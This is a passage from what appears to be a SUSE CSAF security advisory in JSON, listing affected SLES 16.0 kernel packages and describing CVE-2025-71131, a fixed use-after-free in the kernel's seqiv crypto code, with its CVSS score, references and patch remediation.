"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
